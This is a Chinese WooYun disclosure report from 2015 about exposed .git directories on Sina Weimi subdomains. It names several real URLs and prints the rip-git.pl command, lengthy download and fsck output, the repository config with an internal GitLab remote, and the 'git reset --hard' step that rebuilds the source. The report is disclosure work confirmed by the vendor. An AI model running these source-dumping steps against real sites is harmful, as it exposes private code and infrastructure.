当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2015-090998

漏洞标题:新浪微米多站配置不当可重构项目源码

相关厂商:新浪

漏洞作者: 爱上平顶山

提交时间:2015-01-12 12:25

修复时间:2015-02-26 12:26

公开时间:2015-02-26 12:26

漏洞类型:系统/服务运维配置不当

危害等级:中

自评Rank:10

漏洞状态:厂商已经确认

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:

漏洞详情

披露状态:

2015-01-12: 细节已通知厂商并且等待厂商处理中
2015-01-12: 厂商已经确认,细节仅向厂商公开
2015-01-22: 细节向核心白帽子及相关领域专家公开
2015-02-01: 细节向普通白帽子公开
2015-02-11: 细节向实习白帽子公开
2015-02-26: 细节向公众公开

简要描述:

新浪微米
新浪微博基金战略投资微米,此外新浪还委派集团副总裁、新浪微博基金合伙人彭少彬出任微米的执行董事兼CEO

详细说明:

新浪微米
http://www.weimi.me/.git/config
http://top.weimi.me/.git/config
http://code.weimi.me/.git/config
http://activity.weimi.me/.git/config
http://admin.weimi.me/.git/config 后台
http://star.weimi.me/.git/config 可访问
首先用perl脚本把它弄下来

D:\perl\perl\bin>perl.exe rip-git.pl -v -u http://star.weimi.me/.git/ >1.txt
[i] Downloading git files from http://star.weimi.me/.git/
[d] found COMMIT_EDITMSG
[d] found config
[d] found description
[d] found HEAD
[d] found index
[d] found packed-refs
[d] found objects/info/alternates
[d] found info/grafts
[d] found logs/HEAD
[d] found objects/07/88cf6bbadc5ea41c242ad114ec48ba33f40897
[d] found objects/ce/93bba8a3c2807cad5566f0802c8d02c13cf8fb
[d] found objects/ed/781dfc0bb0704275e63cde9e2efb9902b33dd0
[d] found objects/60/46298dd1de74f995995aef8a0002b865d70026
[d] found objects/fd/b8ac054fd13b01058fb842bff9d3e13d80be87
[d] found objects/13/eacde99fdd04d6658c01428ab2e71cde4fe02a
[d] found objects/d9/5d2ffcba4b4ca8c38c0a3b410a5d55cfbb439e
[d] found objects/27/c2e4cf8900df5938cf5b2a794ccdda79c74294
[d] found objects/6a/c100f5685971a581614a9e9f3c929d11dcfb7b
[d] found objects/45/0f5100d6aad53b7d126b38ddf82451cf2bd688
[d] found objects/50/2bbbd8f3b47f4fb06b785a7a72c60d26b72ba1
[d] found objects/7e/0405bbf8a02ed00e6258908a8c04c1d568f108
[d] found objects/ef/08aa2d5be0e3bc2a15a68f1592b2808f7306b0
[d] found objects/44/0611dde7cef572628c40cf973f802959ec2c1b
[d] found objects/73/8a4c7ba40180465b4f8d560352a1e271db3955
[d] found objects/b2/c9a66b4d8f7a4abdf4e647996dcab2eee86ac8
[d] found objects/ca/d80f47b9ac2a6d484c61b87eea58bd5825e092
[d] found objects/b6/7591d3f7f7994a96a4ee026b69e1e883eec20a
[d] found objects/ea/3eb47a4c35d27ac8c51421a28beec09a8d6738
[d] found objects/9f/995b40f115e8ba962db2cff1476fb56125afad
[d] found objects/fb/ce54b7e3cd82cecd1b784acb8fbb71f64e7949
[d] found objects/3c/095426835316df28585901a9f1103302cebf78
[d] found objects/ba/d1aed5c035f8623f4fe15670e80fa58f62a7cb
[d] found objects/4a/8620398b47a6cf8a19fbf7ee0479a5f544c8b6
[d] found objects/1f/5bb2ff8a0070bffc6a21d6a089d616e07c9774
[d] found objects/7b/4a33eae11ee415c1a9b842b53286e1b59b2d85
[d] found objects/d7/b9658c2fb50647aaae549dfcdf38eed265eb5b
[d] found objects/82/de5ad585d4e469ad0b0ab8ea92c11f060209b3
[d] found objects/43/6a7a3a320119d2ebb292071caf38ef7b9164cf
[d] found objects/1e/d3348d4c82a5624f63f332752c9bb2a8e82c92
[d] found objects/22/fd239f0743e9221f79e6661d3b13db09286b28
[d] found objects/35/9cd7130bc152fa1fc9d4feda07cbbc2dd2ac8f
[d] found objects/b2/c7a40b2283910ee16eae8f05f47cc9d80cd66c
[d] found objects/07/daa18080ec5048501cd1547792c14460425934
[d] found objects/5f/a4398a13c0c58884076e8fd1accacce795d3c9
[d] found objects/f4/97f3459fdd8586899d63b01134f82740070ec3
[d] found objects/14/bb1d4127776822a5e08fa990ec19fd4257019a
[d] found objects/0d/114b7886ef47dc70dfc3231c537d7a84343faf
[d] found objects/27/d1082e2825b0055b41f8e4bbd88f06a1bd8cb2
[d] found objects/04/577b3615857df8600487f671a20cd7bfa0d4fe
[d] found objects/21/14ec814c869dbfd010c9d10d72825610886ab7
[d] found objects/e6/0dd972ca5c21a5ed141e0252470ca32c8c00e7
[d] found objects/81/4472f468b31c5227b2e468ce9e30821161aaf4
[d] found objects/35/4466769bd04a00b7eff1e57e8f352212b41c72
[d] found objects/15/f21dcb6a0280ecef3933ae10611dcd3efdce95
[d] found objects/46/21ab94a31449ae73f534b6e27cd2ad07fe3d92
[d] found objects/4a/28a29f2a20c4565b82c69f40798e3064aa40d8
[d] found objects/95/b7b293fe2383f14d66d8ad93c5d50763ef442d
[d] found objects/15/81b4d9c375151b5a5661e7a6fad7ad825dfcf9
[d] found objects/e3/aa5fc8943bf2e1e2c200a03a8fcca5e725db72
[d] found objects/66/a576dd8472e5965b657043de5540b22643f3db
[d] found objects/98/71024f0b329da480c72682f5336e97a98d88b0
[d] found objects/fd/591b60d567b8ff865a5225627ec9a4db4eb2a9
[d] found objects/96/ecd7db72930e462b7aebfb0ba2e65035668d61
[d] found objects/94/f1a9964f7be3a26117032ff9386fecbccc5a62
[d] found objects/e4/e3c303a8c31e83d0aaf8873b69740fe30a0281
[d] found objects/96/ecd7db72930e462b7aebfb0ba2e65035668d61
[d] found objects/59/017f64a152fa31071c16441f93746000234904
[d] found objects/0d/d1aada674eed3de056e35a2abf8dfa2a38f12a
[d] found objects/9b/92f866793ac696e37ff34bcea6c5b57e00ada1
[d] found objects/0f/14acc6327bfbb8c36f925e02fcc601e5cb7cb1
[d] found objects/0b/4580c856e3591cf6ce4ff63fce333217db46e8
[d] found objects/49/274e3eb14454f08211f7f2fa5480bed2ccdcd6
[d] found objects/a9/e7cdf1ea897c341fcaf2cfaa36493c008a7a49
[d] found objects/74/6e9735636bcefa2037c906d18b3f56897d5f94
[d] found objects/69/3d0b6400712e8442c3c9d0dfa9b58e5523e087
[d] found objects/56/11fd610076d60db129b075e35a546ded885cc5
[d] found objects/31/2425ff907938372b2afcc2df04ea468feb46a9
[d] found objects/bc/5f51256c5c775329f3f7d7389e131ab62d9a83
[d] found objects/88/d909f9f8962e87bbf06d615c2283643bba8ed2
[d] found objects/43/f33021e55bd5c8dfae27469cbcf3d0a68d9336
[d] found objects/f4/97f3459fdd8586899d63b01134f82740070ec3
[d] found objects/14/bb1d4127776822a5e08fa990ec19fd4257019a
[d] found objects/0d/114b7886ef47dc70dfc3231c537d7a84343faf
[d] found objects/27/d1082e2825b0055b41f8e4bbd88f06a1bd8cb2
[d] found objects/04/577b3615857df8600487f671a20cd7bfa0d4fe
[d] found objects/21/14ec814c869dbfd010c9d10d72825610886ab7
[d] found objects/e6/0dd972ca5c21a5ed141e0252470ca32c8c00e7
[d] found objects/81/4472f468b31c5227b2e468ce9e30821161aaf4
[d] found objects/35/4466769bd04a00b7eff1e57e8f352212b41c72
[d] found objects/15/f21dcb6a0280ecef3933ae10611dcd3efdce95
[d] found objects/46/21ab94a31449ae73f534b6e27cd2ad07fe3d92
[d] found objects/4a/28a29f2a20c4565b82c69f40798e3064aa40d8
[d] found objects/95/b7b293fe2383f14d66d8ad93c5d50763ef442d
[d] found objects/15/81b4d9c375151b5a5661e7a6fad7ad825dfcf9
[d] found objects/e3/aa5fc8943bf2e1e2c200a03a8fcca5e725db72
[d] found objects/66/a576dd8472e5965b657043de5540b22643f3db
[d] found objects/98/71024f0b329da480c72682f5336e97a98d88b0
[d] found objects/fd/591b60d567b8ff865a5225627ec9a4db4eb2a9
[d] found objects/96/ecd7db72930e462b7aebfb0ba2e65035668d61
[d] found objects/94/f1a9964f7be3a26117032ff9386fecbccc5a62
[d] found objects/e4/e3c303a8c31e83d0aaf8873b69740fe30a0281
[d] found objects/96/ecd7db72930e462b7aebfb0ba2e65035668d61
[d] found objects/59/017f64a152fa31071c16441f93746000234904
[d] found objects/0d/d1aada674eed3de056e35a2abf8dfa2a38f12a
[d] found objects/9b/92f866793ac696e37ff34bcea6c5b57e00ada1
[d] found objects/0f/14acc6327bfbb8c36f925e02fcc601e5cb7cb1
[d] found objects/0b/4580c856e3591cf6ce4ff63fce333217db46e8
[d] found objects/49/274e3eb14454f08211f7f2fa5480bed2ccdcd6
[d] found objects/a9/e7cdf1ea897c341fcaf2cfaa36493c008a7a49
[d] found objects/74/6e9735636bcefa2037c906d18b3f56897d5f94
[d] found objects/69/3d0b6400712e8442c3c9d0dfa9b58e5523e087
[d] found objects/56/11fd610076d60db129b075e35a546ded885cc5
[d] found objects/31/2425ff907938372b2afcc2df04ea468feb46a9
[d] found objects/bc/5f51256c5c775329f3f7d7389e131ab62d9a83
[d] found objects/88/d909f9f8962e87bbf06d615c2283643bba8ed2
[d] found objects/43/f33021e55bd5c8dfae27469cbcf3d0a68d9336
[d] found objects/5a/d551a2c1149393804076dc9131f1bd9e21280a
[d] found objects/30/2b47ff995d25ce2b2459f176893c0957a2d5e2
[d] found objects/6a/6486f7aee011da9c2497fdcce2b085e2efa7f8
[d] found objects/e4/7d03a9533eb5284cfd36786a7608772aeb3928
[d] found objects/d5/23939a5a51a040cc5f72fc05e46015fd4ad640
[d] found objects/3b/b066542539dcf64875273598d9df8136b16b7a
[d] found objects/40/013017e9d9bf41d0693bcb095545fbcfba54e4
[d] found objects/d8/1ea9effdb748db47a7753c11180b3b225c7420
[d] found objects/16/129d88af04592f1cb3c00476500b97b31912de
[d] found objects/18/2dea2228caeabf3b31d48119adec365a8dfa8e
[d] found objects/16/129d88af04592f1cb3c00476500b97b31912de
[d] found objects/bb/99e053ebb47a652e6867d6ca68737c234a6121
[d] found objects/bf/256c1a264358bc9c05b1487daaa274d0d9104e
[d] found objects/86/51e57f736b9061ac82134190b7ea9768024b7d
[d] found objects/b1/6400602e9642fa4bee88e1b4aac55de2c3e5d1
[d] found refs/heads/master
[i] Running git fsck to check for missing items
Checking object directories: 100% (256/256), done.
 does not exist; check .git/objects/info/alternates.s/<!DOCTYPE HTML>
error: object directory D:/perl/perl/bin/.git/objects/<html xmlns="http:/www.w3.
 does not exist; check .git/objects/info/alternates.
 does not exist; check .git/objects/info/alternates.s/<head>
error: object directory D:/perl/perl/bin/.git/objects/<meta http-equiv="Content-
 does not exist; check .git/objects/info/alternates.
error: object directory D:/perl/perl/bin/.git/objects/<title>应用授权 - 微米</ti
 does not exist; check .git/objects/info/alternates.
error: object directory D:/perl/perl/bin/.git/objects/<link type="text/css" href
 does not exist; check .git/objects/info/alternates." rel="stylesheet" />
error: object directory D:/perl/perl/bin/.git/objects/<link rel="stylesheet" typ
 does not exist; check .git/objects/info/alternates.>
 does not exist; check .git/objects/info/alternates.s/
 does not exist; check .git/objects/info/alternates.s/<!--<style>
error: object directory D:/perl/perl/bin/.git/objects/  body { padding-bottom:30
 does not exist; check .git/objects/info/alternates.
 does not exist; check .git/objects/info/alternates.s/</style>-->
 does not exist; check .git/objects/info/alternates.s/</head>
error: object directory D:/perl/perl/bin/.git/objects/<body class="WB_UIbody WB_
 does not exist; check .git/objects/info/alternates.
error: object directory D:/perl/perl/bin/.git/objects/<div class="WB_xline1 oaut
 does not exist; check .git/objects/info/alternates.
 does not exist; check .git/objects/info/alternates.s/ <div class="oauth_wrap">
error: object directory D:/perl/perl/bin/.git/objects/    <div class="oauth_head
 does not exist; check .git/objects/info/alternates.
error: object directory D:/perl/perl/bin/.git/objects/      <h1 class="WB_logo"
 does not exist; check .git/objects/info/alternates.
error: object directory D:/perl/perl/bin/.git/objects/          <p class="login_
account"><a href="###" class="special_login_link" node-type="loginswitch">二维码
登录</a><span class="vline vline_login">|</span><a class="sign_up_link" href="ht
tp:/weibo.com/signup/signup.php?from=zw&appsrc=62dLrY&backurl=https%3A%2F%2Fapi.
weibo.com%2F2%2Foauth2%2Fauthorize%3Fclient_id%3D3743280666%26response_type%3Dco
de%26display%3Ddefault%26redirect_uri%3Dhttp%253A%252F%252Fstar.weimi.me%252Flin
 does not exist; check .git/objects/info/alternates.注册</a>
 does not exist; check .git/objects/info/alternates.s/          </p>
 does not exist; check .git/objects/info/alternates.s/    </div>
 does not exist; check .git/objects/info/alternates.s/    <!-- 带头像  -->
error: object directory D:/perl/perl/bin/.git/objects/    <div class="WB_panel o
 does not exist; check .git/objects/info/alternates.
error: object directory D:/perl/perl/bin/.git/objects/    <form name="authZForm"
 does not exist; check .git/objects/info/alternates."form">
error: object directory D:/perl/perl/bin/.git/objects/      <div class="oauth_co
 does not exist; check .git/objects/info/alternates.
error: object directory D:/perl/perl/bin/.git/objects/        <p class="oauth_ma
 does not exist; check .git/objects/info/alternates.
error: object directory D:/perl/perl/bin/.git/objects/                  授权  <a
 href="http:/app.weibo.com/t/feed/62dLrY"  target="_blank" class="app_name">微米
 does not exist; check .git/objects/info/alternates.
error: object directory D:/perl/perl/bin/.git/objects/          ,并同时登录微博
 does not exist; check .git/objects/info/alternates.
 does not exist; check .git/objects/info/alternates.s/
 does not exist; check .git/objects/info/alternates.s/        <!-- 登录 -->
error: object directory D:/perl/perl/bin/.git/objects/          <div class="oaut
 does not exist; check .git/objects/info/alternates.
error: object directory D:/perl/perl/bin/.git/objects/            <!-- <form nam
 does not exist; check .git/objects/info/alternates.type="form"> -->
error: object directory D:/perl/perl/bin/.git/objects/
 does not exist; check .git/objects/info/alternates.alue="login"/>
error: object directory D:/perl/perl/bin/.git/objects/
 does not exist; check .git/objects/info/alternates.value="default"/>
error: object directory D:/perl/perl/bin/.git/objects/
   <input type="hidden" name="withOfficalFlag"  id="withOfficalFlag" value="0"/>
 does not exist; check .git/objects/info/alternates.
error: object directory D:/perl/perl/bin/.git/objects/
 does not exist; check .git/objects/info/alternates._auth" value="null"/>
error: object directory D:/perl/perl/bin/.git/objects/
   <input type="hidden" name="withOfficalAccount"  id="withOfficalAccount" value
 does not exist; check .git/objects/info/alternates.
error: object directory D:/perl/perl/bin/.git/objects/
   <input type="hidden" name="scope"  id="scope" value="invitation_write,follow_
 does not exist; check .git/objects/info/alternates.
error: object directory D:/perl/perl/bin/.git/objects/
 does not exist; check .git/objects/info/alternates.lue=""/>
error: object directory D:/perl/perl/bin/.git/objects/
 does not exist; check .git/objects/info/alternates.ginSina" value=""/>
error: object directory D:/perl/perl/bin/.git/objects/
 does not exist; check .git/objects/info/alternates.p:-9999px"/>
error: object directory D:/perl/perl/bin/.git/objects/
 does not exist; check .git/objects/info/alternates.code"/>
error: object directory D:/perl/perl/bin/.git/objects/
   <input type="hidden" name="regCallback" value="https%3A%2F%2Fapi.weibo.com%2F
2%2Foauth2%2Fauthorize%3Fclient_id%3D3743280666%26response_type%3Dcode%26display
%3Ddefault%26redirect_uri%3Dhttp%253A%252F%252Fstar.weimi.me%252Flingengxin%26fr
 does not exist; check .git/objects/info/alternates.
error: object directory D:/perl/perl/bin/.git/objects/                 <input ty
 does not exist; check .git/objects/info/alternates.imi.me/lingengxin"/>
error: object directory D:/perl/perl/bin/.git/objects/                 <input ty
 does not exist; check .git/objects/info/alternates.
error: object directory D:/perl/perl/bin/.git/objects/                 <input ty
 does not exist; check .git/objects/info/alternates.
error: object directory D:/perl/perl/bin/.git/objects/                 <input ty
 does not exist; check .git/objects/info/alternates.085c87c2a2712fbbe2fae7a2"/>
error: object directory D:/perl/perl/bin/.git/objects/                 <input ty
 does not exist; check .git/objects/info/alternates.
error: object directory D:/perl/perl/bin/.git/objects/                 <input ty
 does not exist; check .git/objects/info/alternates.
error: object directory D:/perl/perl/bin/.git/objects/                 <input ty
 does not exist; check .git/objects/info/alternates.ue="0"/>
 does not exist; check .git/objects/info/alternates.s/
error: object directory D:/perl/perl/bin/.git/objects/
 does not exist; check .git/objects/info/alternates.
error: object directory D:/perl/perl/bin/.git/objects/
 does not exist; check .git/objects/info/alternates.
error: object directory D:/perl/perl/bin/.git/objects/
 does not exist; check .git/objects/info/alternates.>
error: object directory D:/perl/perl/bin/.git/objects/
      <input type="text" class="WB_iptxt oauth_form_input" id="userId" name="use
rId"  value="请用微博帐号登录" node-type="userid" autocomplete="off" tabindex="1
 does not exist; check .git/objects/info/alternates.
error: object directory D:/perl/perl/bin/.git/objects/
 does not exist; check .git/objects/info/alternates.
error: object directory D:/perl/perl/bin/.git/objects/
 does not exist; check .git/objects/info/alternates.
error: object directory D:/perl/perl/bin/.git/objects/
 does not exist; check .git/objects/info/alternates.>
error: object directory D:/perl/perl/bin/.git/objects/
      <input type="password" class="WB_iptxt oauth_form_input" id="passwd" name=
 does not exist; check .git/objects/info/alternates.dex="2"/>
error: object directory D:/perl/perl/bin/.git/objects/
 does not exist; check .git/objects/info/alternates.
error: object directory D:/perl/perl/bin/.git/objects/
                <p class="oauth_code" node-type="validateBox" style="display:non
 does not exist; check .git/objects/info/alternates.
error: object directory D:/perl/perl/bin/.git/objects/
 does not exist; check .git/objects/info/alternates. 证码:</label>
error: object directory D:/perl/perl/bin/.git/objects/
                  <input type="text" tabindex="3" node-type="vcode" class="WB_ip
txt oauth_form_input oauth_form_code"><span class="code_img"><img node-type="pin
code" width="75" height="30" /></span><a class="WB_text2"  node-type="changeCode
 does not exist; check .git/objects/info/alternates.
error: object directory D:/perl/perl/bin/.git/objects/
 does not exist; check .git/objects/info/alternates.
error: object directory D:/perl/perl/bin/.git/objects/
 does not exist; check .git/objects/info/alternates.nBox" style="display:none">
error: object directory D:/perl/perl/bin/.git/objects/
 does not exist; check .git/objects/info/alternates. 盾动态码:</label>
error: object directory D:/perl/perl/bin/.git/objects/
                  <input type="text" tabindex="3" class="WB_iptxt oauth_form_inp
 does not exist; check .git/objects/info/alternates.
error: object directory D:/perl/perl/bin/.git/objects/
 does not exist; check .git/objects/info/alternates.
error: object directory D:/perl/perl/bin/.git/objects/
 does not exist; check .git/objects/info/alternates.
error: object directory D:/perl/perl/bin/.git/objects/
 does not exist; check .git/objects/info/alternates.
error: object directory D:/perl/perl/bin/.git/objects/
<div class="tips WB_tips_yls WB_oauth_tips" node-type="tipBox" style="display:no
 does not exist; check .git/objects/info/alternates.
error: object directory D:/perl/perl/bin/.git/objects/
        <span class="WB_tipS_err"></span><span class="WB_sp_txt" node-type="tipC
 does not exist; check .git/objects/info/alternates.
error: object directory D:/perl/perl/bin/.git/objects/
 does not exist; check .git/objects/info/alternates.n>
error: object directory D:/perl/perl/bin/.git/objects/
 does not exist; check .git/objects/info/alternates.pe="tipClose"></a>
error: object directory D:/perl/perl/bin/.git/objects/
 does not exist; check .git/objects/info/alternates.
 does not exist; check .git/objects/info/alternates.s/        </div>
error: object directory D:/perl/perl/bin/.git/objects/        <div class="oauth_
 does not exist; check .git/objects/info/alternates.
error: object directory D:/perl/perl/bin/.git/objects/          <div class="oaut
 does not exist; check .git/objects/info/alternates.
error: object directory D:/perl/perl/bin/.git/objects/              <p class="oa
uth_formbtn"><a node-type="submit" tabindex="4" action-type="submit"  href="java
script:;" class="WB_btn_login formbtn_01"></a><a node-type="cancel" tabindex="5"
 does not exist; check .git/objects/info/alternates.btn_cancel"></a></p>
 does not exist; check .git/objects/info/alternates.s/          </div>
error: object directory D:/perl/perl/bin/.git/objects/          <!-- todo 添加ap
 does not exist; check .git/objects/info/alternates.
 does not exist; check .git/objects/info/alternates.s/         </div>
 does not exist; check .git/objects/info/alternates.s/        <!-- /登录 -->
 does not exist; check .git/objects/info/alternates.s/        </div>
 does not exist; check .git/objects/info/alternates.s/
 does not exist; check .git/objects/info/alternates.s/      </form>
 does not exist; check .git/objects/info/alternates.s/    </div>
 does not exist; check .git/objects/info/alternates.s/    <!-- /带头像 -->
error: object directory D:/perl/perl/bin/.git/objects/    <!-- 根据域名修改文案
 does not exist; check .git/objects/info/alternates.
error: object directory D:/perl/perl/bin/.git/objects/      <p class="oauth_tipt
 does not exist; check .git/objects/info/alternates.i.weibo.com 开头</p>
 does not exist; check .git/objects/info/alternates.s/
 does not exist; check .git/objects/info/alternates.s/          </div>
 does not exist; check .git/objects/info/alternates.s/  </div>
 does not exist; check .git/objects/info/alternates.s/
 does not exist; check .git/objects/info/alternates.s/  <!-- 二维码蒙层部分 -->
error: object directory D:/perl/perl/bin/.git/objects/<div class="qr-cover" styl
 does not exist; check .git/objects/info/alternates.
error: object directory D:/perl/perl/bin/.git/objects/    <div class="qr-cover-i
 does not exist; check .git/objects/info/alternates.
error: object directory D:/perl/perl/bin/.git/objects/        <h1 class="qr-titl
 does not exist; check .git/objects/info/alternates.
error: object directory D:/perl/perl/bin/.git/objects/            用微博账号安全
 does not exist; check .git/objects/info/alternates.
 does not exist; check .git/objects/info/alternates.s/        </h1>
error: object directory D:/perl/perl/bin/.git/objects/        <div class="qr-cod
 does not exist; check .git/objects/info/alternates.
 does not exist; check .git/objects/info/alternates.s/        </div>
error: object directory D:/perl/perl/bin/.git/objects/        <div class="qr-tip
 does not exist; check .git/objects/info/alternates.
error: object directory D:/perl/perl/bin/.git/objects/            <div class="qr
 does not exist; check .git/objects/info/alternates.
error: object directory D:/perl/perl/bin/.git/objects/            <div class="qr
 does not exist; check .git/objects/info/alternates. api.weibo.com 开头</div>
 does not exist; check .git/objects/info/alternates.s/        </div>
error: object directory D:/perl/perl/bin/.git/objects/        <div class="qr-cha
nge"><a href="#" onclick="return false;" action-type="qrmsgclose" class="qr-chan
 does not exist; check .git/objects/info/alternates.
 does not exist; check .git/objects/info/alternates.s/    </div>
 does not exist; check .git/objects/info/alternates.s/</div>
 does not exist; check .git/objects/info/alternates.s/<!-- /二维码蒙层部分 -->
error: object directory D:/perl/perl/bin/.git/objects/  <script src="/oauth2/js/
 does not exist; check .git/objects/info/alternates.script>
error: object directory D:/perl/perl/bin/.git/objects/<script type="text/javascr
 does not exist; check .git/objects/info/alternates.</script>
error: object directory D:/perl/perl/bin/.git/objects/<script type="text/javascr
 does not exist; check .git/objects/info/alternates.
 does not exist; check .git/objects/info/alternates.s/  (function() {
 does not exist; check .git/objects/info/alternates.s/  if(self !== top) {
 does not exist; check .git/objects/info/alternates.s/  var img = new Image();
error: object directory D:/perl/perl/bin/.git/objects/  var src = 'https:/api.we
ibo.com/oauth2/images/bg_layerr.png?oauth=1&page=web&refer=' + document.referrer
 does not exist; check .git/objects/info/alternates.
 does not exist; check .git/objects/info/alternates.s/  img.src = src
error: object directory D:/perl/perl/bin/.git/objects/  img = null; /释放局部变
 does not exist; check .git/objects/info/alternates.
 does not exist; check .git/objects/info/alternates.s/  }
 does not exist; check .git/objects/info/alternates.s/  })();
 does not exist; check .git/objects/info/alternates.s/</script>
 does not exist; check .git/objects/info/alternates.s/</body>
 does not exist; check .git/objects/info/alternates.s/</html>
 does not exist; check .git/objects/info/alternates.s/
error: inflate: data stream error (invalid code lengths set)
error: unable to unpack 04577b3615857df8600487f671a20cd7bfa0d4fe header
error: inflate: data stream error (invalid code lengths set)
fatal: loose object 04577b3615857df8600487f671a20cd7bfa0d4fe (stored in .git/obj
ects/04/577b3615857df8600487f671a20cd7bfa0d4fe) is corrupt
导入git:
root@kail:~/.git# ls -al
总用量 68
drwxrwxrwx  6 root root  4096  1月 10 10:52 .
drwxr-xr-x 31 root root  4096  1月 10 11:00 ..
-rwxrw-rw-  1 root root    40  1月 10 10:52 COMMIT_EDITMSG
-rwxrw-rw-  1 root root   280  1月 10 10:52 config
-rwxrw-rw-  1 root root    74  1月 10 10:52 description
-rwxrw-rw-  1 root root    24  1月 10 10:52 HEAD
-rwxrw-rw-  1 root root 23074  1月 10 10:52 index
drwxrwxrwx  2 root root  4096  1月 10 10:52 info
drwxrwxrwx  3 root root  4096  1月 10 10:52 logs
drwxrwxrwx 77 root root  4096  1月 10 10:52 objects
-rwxrw-rw-  1 root root   109  1月 10 10:52 packed-refs
drwxrwxrwx  5 root root  4096  1月 10 10:52 refs
看下:
root@kail:~/.git# cat config
[core]
	repositoryformatversion = 0
	filemode = true
	bare = false
	logallrefupdates = true
[remote "origin"]
	url = git@gitlab.hiwemeet.com:beijing_php/star.git
	fetch = +refs/heads/*:refs/remotes/origin/*
[branch "master"]
	remote = origin
	merge = refs/heads/master
然后:
root@kail:~/.git# git reset --hard
即可~


ok

漏洞证明:

···

修复方案:

删~

版权声明:转载请注明来源 爱上平顶山@乌云

漏洞回应

厂商回应:

危害等级:中

漏洞Rank:6

确认时间:2015-01-12 19:08

厂商回复:

感谢关注新浪安全,漏洞修复中。

最新状态:

暂无

漏洞评价:

评论

  1. 2015-01-12 12:34 | 疯狗 认证白帽子 ( 实习白帽子 | Rank:44 漏洞数:2 | 阅尽天下漏洞,心中自然无码。)

    可重构项目源码是啥意思,改掉项目内容?

  2. 2015-01-12 12:43 | 爱上平顶山 认证白帽子 ( 核心白帽子 | Rank:2738 漏洞数:547 | [不戴帽子]异乡过客.曾就职于天朝某机构.IT...)

    @疯狗 还原项目源代码 WooYun: 中石油某站源码重构到GetShell

  3. 2015-01-12 13:01 | he1renyagao ( 普通白帽子 | Rank:225 漏洞数:29 | 是金子总会发光,在还未发光之前,先打磨打...)

    @爱上平顶山 struts+tomcat+nginx web.xml 类似问题??

  4. 2015-01-12 13:18 | 孤独雪狼 ( 普通白帽子 | Rank:710 漏洞数:145 | 七夕手机被偷,这坑爹的七夕啊 。。。。)

    看来攒洞是个不好的习惯。。。。存货又没了